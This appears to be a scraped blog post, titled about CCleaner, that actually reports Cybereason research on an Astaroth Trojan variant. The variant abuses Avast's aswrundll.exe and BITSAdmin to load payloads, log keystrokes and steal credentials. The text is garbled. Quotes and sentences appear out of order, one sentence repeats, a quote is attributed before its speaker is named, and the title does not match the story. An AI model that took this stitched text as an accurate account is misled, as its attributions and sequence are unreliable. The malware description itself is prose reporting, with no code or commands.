Avast ccleaner malware domain targets3/19/2023 ![]() Since this is not an exploit, there is no obligation for them to provide formal or advance communication," Avast said in a statement. "We learned about this particular Astaroth Trojan variant analyzed in Cybereason's report. It's a legitimate process with legitimate uses that's just being used for malicious purposes - in this case, to load and execute malicious modules, he explained. However, just like regsvr32, it can be misused for malicious activity." "It's not something that Avast needs to fix or patch, because this process is just part of their product it's just like a Microsoft process that has the ability to be used maliciously," Salem said. Salem said the Astaroth malware variant doesn't need to take advantage of a bug or vulnerability in code. The recent variant that we found leverages its payload execution through targeted security-related products. Upon successful infiltration, it logs user keystrokes, intercepts their operating system calls and gathers information to steal credentials, including passwords. The Astaroth Trojan malware disguises its payload as JPEG, GIF and extensionless files to avoid detection, researchers found. This version maliciously used BITSAdmin to download the payload, while earlier versions of the campaign used certutil, Salem said. "However, the recent variant that we found leverages its payload execution through targeted security-related products and obfuscates itself as much as it can at the remote server domain and changes some of its processes in doing so." ![]() "Astaroth malware is very similar to other variants that we have seen since mid-2018 in terms of how it propagates itself," said Eli Salem, security researcher at Cybereason. The campaign targeted Brazil and parts of Europe, and it gained momentum toward the end of 2018, according to a blog post detailing the research. The spam campaign also made malicious use of unins000.exe, a process that belongs to GAS Tecnologia, a Brazilian information security company. Earlier versions of the malware, which was first detected in 2017, would scan targeted systems for Avast and simply quit if the antivirus program was detected. Researchers said, because Avast is one of most common antivirus programs in the world, this makes it an effective evasion strategy. Reported by Cybereason's Nocturnus Research team earlier this week, the latest version of the Astaroth Trojan injects a malicious module into one of Avast's processes, aswrundll.exe.
0 Comments
Leave a Reply.AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |